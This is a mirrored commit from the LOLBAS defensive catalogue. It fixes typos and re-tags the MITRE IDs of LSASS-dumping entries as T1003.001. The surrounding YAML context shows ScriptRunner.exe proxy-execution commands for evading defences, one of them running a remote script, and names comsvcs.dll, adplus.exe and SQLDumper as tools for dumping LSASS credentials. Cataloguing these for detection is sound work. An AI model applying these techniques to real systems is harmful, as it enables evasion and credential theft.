mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
LSASS realign to T1003.001
This commit is contained in:
parent
df8c88f4ca
commit
2380c506d4
@ -6,14 +6,14 @@ Created: 2018-05-25
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: Scriptrunner.exe -appvscript calc.exe
|
- Command: Scriptrunner.exe -appvscript calc.exe
|
||||||
Description: Executes calc.exe
|
Description: Executes calc.exe
|
||||||
Usecase: Execute binary through proxy binary to evade defensive counter measurments
|
Usecase: Execute binary through proxy binary to evade defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1202
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
||||||
Description: Executes calc.cmd from remote server
|
Description: Executes calc.cmd from remote server
|
||||||
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
|
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
|
@ -9,7 +9,7 @@ Commands:
|
|||||||
Usecase: Dump Lsass.exe process memory to retrieve credentials.
|
Usecase: Dump Lsass.exe process memory to retrieve credentials.
|
||||||
Category: Dump
|
Category: Dump
|
||||||
Privileges: SYSTEM
|
Privileges: SYSTEM
|
||||||
MitreID: T1003
|
MitreID: T1003.001
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\comsvcs.dll
|
- Path: c:\windows\system32\comsvcs.dll
|
||||||
|
@ -9,7 +9,7 @@ Commands:
|
|||||||
Usecase: Create memory dump and parse it offline
|
Usecase: Create memory dump and parse it offline
|
||||||
Category: Dump
|
Category: Dump
|
||||||
Privileges: SYSTEM
|
Privileges: SYSTEM
|
||||||
MitreID: T1003
|
MitreID: T1003.001
|
||||||
OperatingSystem: All Windows
|
OperatingSystem: All Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
|
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
|
||||||
|
@ -16,7 +16,7 @@ Commands:
|
|||||||
Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.
|
Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.
|
||||||
Category: Dump
|
Category: Dump
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1003
|
MitreID: T1003.001
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
|
- Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
|
||||||
|
Loading…
Reference in New Issue
Block a user